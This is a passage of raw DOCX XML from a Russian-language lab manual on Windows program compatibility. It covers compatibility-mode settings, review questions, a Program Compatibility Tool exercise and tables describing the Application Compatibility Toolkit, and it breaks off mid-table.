      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Отключение визуальных тем оформления</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Отключение тем оформления в программе. Включите этот параметр при наличии проблем с меню или кнопками в строке заголовка программы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidRDefault="00442A4D" w:rsidP="00442A4D">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Отключение создания рабочего стола</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Отключение прозрачности и других дополнительных возможностей экрана. Включите этот параметр, если окна перемещаются беспорядочно или имеются другие неполадки изображения</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidRDefault="00442A4D" w:rsidP="00442A4D">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Отключение масштабирования изображения при высоком разрешении экрана</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Отключение автоматического изменения размера программ при использовании крупного шрифта. Включите этот параметр, если крупные шрифты нарушают внешний вид программы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidRDefault="00442A4D" w:rsidP="00442A4D">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Уровень прав</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Запуск программы от имени администратора. Для правильной работы некоторых программ необходимы права администратора. Данный параметр доступен только при входе в систему с учетной записью администратора.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidRDefault="00442A4D" w:rsidP="00442A4D">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Изменить параметры для всех пользователей</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Выбор параметров, которые будут применены для всех пользователей данного компьютера.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidRDefault="00442A4D" w:rsidP="00442A4D">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Перечень контрольных вопросов:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidRDefault="00442A4D" w:rsidP="00442A4D">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1. Что такое операционная система?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidRDefault="00442A4D" w:rsidP="00442A4D">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2. Что такое метод решения проблем совместимости – использование DLL?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidRDefault="00442A4D" w:rsidP="00442A4D">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3. Что такое технологии создания в системе виртуальной машины?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005137F6" w:rsidRPr="00617AC0" w:rsidRDefault="005137F6" w:rsidP="005137F6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="105" w:name="_Toc507788250"/>
      <w:bookmarkStart w:id="106" w:name="_Toc507788525"/>
    </w:p>
    <w:p w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidRDefault="005137F6" w:rsidP="005137F6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Задание. </w:t>
      </w:r>
      <w:r w:rsidR="00442A4D" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Решение проблемы сбоя ПО отраслевой направленности</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> с помозью</w:t>
      </w:r>
      <w:r w:rsidR="00442A4D" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>программы</w:t>
      </w:r>
      <w:r w:rsidR="00442A4D" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> для настройки параметров старых приложений</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Program Compatibility Tool</w:t>
      </w:r>
      <w:r w:rsidR="00442A4D" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="105"/>
      <w:bookmarkEnd w:id="106"/>
    </w:p>
    <w:p w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidRDefault="00442A4D" w:rsidP="00442A4D">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Требования к отчету: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Отчет, в котором содержатся скриншоты этапов выполнения работы и комментарии к ним.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidRDefault="00442A4D" w:rsidP="00442A4D">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ход работы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidRDefault="00442A4D" w:rsidP="00442A4D">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Необходимо установить и запустить программное обеспечение, предназначенное для предыдущих версий операционной системы используя инструкции из теоретической части.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidRDefault="00442A4D" w:rsidP="00442A4D">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Основные теоретические сведения:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidRDefault="00442A4D" w:rsidP="00442A4D">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Набор Application Compatibility Toolkit предназначен для того, чтобы помочь вам провести инвентаризацию, анализ, рационализацию и определение приоритетов всех ваших приложений. На Рисунке 1 перечислены компоненты набора.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidRDefault="00442A4D" w:rsidP="00442A4D">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Рисунок 1 Компоненты набора Application Compatibility Toolkit</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af2"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2501"/>
        <w:gridCol w:w="7105"/>
      </w:tblGrid>
      <w:tr w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidTr="005137F6">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2501" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidRDefault="00442A4D" w:rsidP="005137F6">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Компонент</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7105" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidRDefault="00442A4D" w:rsidP="005137F6">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Описание</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidTr="005137F6">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2501" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidRDefault="00442A4D" w:rsidP="005137F6">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Средства оценки совместимости</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7105" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidRDefault="00442A4D" w:rsidP="005137F6">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>На компьютере могут одновременно работать несколько средств оценки совместимости, позволяющие обнаружить и зарегистрировать возможные проблемы с совместимостью приложений.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidTr="005137F6">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2501" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidRDefault="00442A4D" w:rsidP="005137F6">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Обработка журнала</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7105" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidRDefault="00442A4D" w:rsidP="005137F6">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Собирает сводную информацию по совместимости с нескольких отдельных компьютеров и регулярно отправляет ее в центральный файл журнала.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidTr="005137F6">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2501" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidRDefault="00442A4D" w:rsidP="005137F6">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>База данных инвентаризации</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7105" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidRDefault="00442A4D" w:rsidP="005137F6">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Используется диспетчером совместимости приложений для подготовки отчетов, содержит много новых полей для контроля состояния и внедрения каждого приложения.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidTr="005137F6">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2501" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidRDefault="00442A4D" w:rsidP="005137F6">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Диспетчер совместимости приложений</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7105" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidRDefault="00442A4D" w:rsidP="005137F6">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Центральное средство управления, обеспечивающее возможности мониторинга и изменения информации, Относящейся к внедрению.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidTr="005137F6">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2501" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidRDefault="00442A4D" w:rsidP="005137F6">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Microsoft CompatibilityExchange</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7105" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidRDefault="00442A4D" w:rsidP="005137F6">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Открытый ресурс для обмена информацией о совместимости. Через систему Microsoft Compatibility Exchange можно получить дополнительную информацию, в том числе результаты для других пользователей, информацию о сертификации приложений Microsoft certification и информацию о разработчиках.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidRDefault="00442A4D" w:rsidP="00442A4D">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>На Рисунке 2 показаны отдельные средства оценки производительности, включенные в состав набора.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidRDefault="00442A4D" w:rsidP="00442A4D">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Рисунок 2 Средства оценки совместимости</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af2"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2232"/>
        <w:gridCol w:w="7374"/>
      </w:tblGrid>
      <w:tr w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidTr="000C00A6">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2232" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidRDefault="00442A4D" w:rsidP="000C00A6">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Средство оценки</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7374" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidRDefault="00442A4D" w:rsidP="000C00A6">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Описание</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidTr="000C00A6">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2232" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidRDefault="00442A4D" w:rsidP="000C00A6">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Инвентаризация</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7374" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidRDefault="00442A4D" w:rsidP="000C00A6">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Отслеживает несколько областей системы, собирает информацию о приложениях на каждом компьютере и связанных с ними компонентах.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidTr="000C00A6">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2232" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidRDefault="00442A4D" w:rsidP="000C00A6">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Internet Explorer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7374" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidRDefault="00442A4D" w:rsidP="000C00A6">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Отслеживает работу Internet Explorer 7.0, чтобы обнаружить веб-приложения, в которых могут возникнуть проблемы с совместимостью. Места размещения веб-приложений регистрируются для дальнейшей обработки.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidTr="000C00A6">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2232" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidRDefault="00442A4D" w:rsidP="000C00A6">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Управление учетными записями пользователей</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7374" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidRDefault="00442A4D" w:rsidP="000C00A6">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Отслеживает взаимодействие пользователей с приложениями и регистрирует информацию приложения для обработки при запросах повышения уровня привилегий.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidTr="000C00A6">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2232" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidRDefault="00442A4D" w:rsidP="000C00A6">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>GINA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7374" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidRDefault="00442A4D" w:rsidP="000C00A6">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Отслеживает использование приложениями учетных данных на основе устаревшей архитектуры и регистрирует эти приложения, показывая необходимость изменений.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidTr="000C00A6">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2232" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidRDefault="00442A4D" w:rsidP="000C00A6">
            <w:pPr>
